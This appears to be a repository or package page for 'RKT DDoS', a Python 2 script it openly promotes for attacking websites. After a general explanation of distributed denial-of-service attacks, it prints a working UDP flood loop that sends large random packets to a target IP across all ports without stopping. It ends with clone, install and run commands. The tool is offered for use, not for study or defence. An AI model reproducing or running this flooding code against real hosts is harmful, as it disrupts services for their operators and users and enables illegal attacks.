rktddos
rktddos copied to clipboard
RKT DDoS is a python script for online attacking.This is a computer missile for website attacking.
RKT DDoS
Author : RKT
Description
DDoS(Distributed Denial-Of-Service)
A distributed denial-of-service (DDoS) attack is a malicious attempt to disrupt the normal traffic of a targeted server, service or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic.
DDoS attacks achieve effectiveness by utilizing multiple compromised computer systems as sources of attack traffic. Exploited machines can include computers and other networked resources such as IoT devices.
From a high level, a DDoS attack is like an unexpected traffic jam clogging up the highway, preventing regular traffic from arriving at its destination.
Python DDoS Code(Basic)
import socket
import random
rkt = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(51200)
ip = "127.0.0.1"
port = 80
sent = 0
while True:
... rkt.sendto(bytes,(ip,port))
... sent = sent + 1
... port = port + 1
... print "SENT %s PACKET TO %s THROUGHT PORT:%s" % (sent,ip,port)
... if port == 65535:
... port = 1
Tested On
- Ubuntu
- Kali Linux
- Linuxmint
- Parrot Os
Setup
- sudo pip2 install requirements.txt
Terminal Command
- git clone https://github.com/r3k4t/rktddos.git
- cd rktddos
- sudo python2 rktddos.py
Screentshots
Next
Next